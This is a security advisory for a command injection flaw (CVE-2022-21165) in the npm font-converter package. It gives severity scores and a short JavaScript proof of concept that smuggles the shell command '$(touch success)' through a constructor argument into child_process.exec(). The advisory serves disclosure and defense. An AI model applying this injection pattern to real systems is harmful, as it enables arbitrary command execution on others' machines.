CVE-2022-21165 – font-converter

Package

Manager: npm
Name: font-converter
Vulnerable Version: >=0 <=1.1.1

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.01299 pctl0.78945

Details

Font-Converter Vulnerable to Arbitrary Command Injection ### Overview font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF) All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the `child_process.exec()` function. ### PoC ```js var PUT = require('font-converter'); var x = "$(touch success);# "; try { new PUT(x, x, x, x); } catch (e) { console.log(e); } ```

Metadata

Created: 2022-08-29T20:06:54Z
Modified: 2024-04-22T23:17:12Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-g2c3-vwff-m3xr/GHSA-g2c3-vwff-m3xr.json
CWE IDs: ["CWE-77"]
Alternative ID: GHSA-g2c3-vwff-m3xr
Finding: F422
Auto approve: 1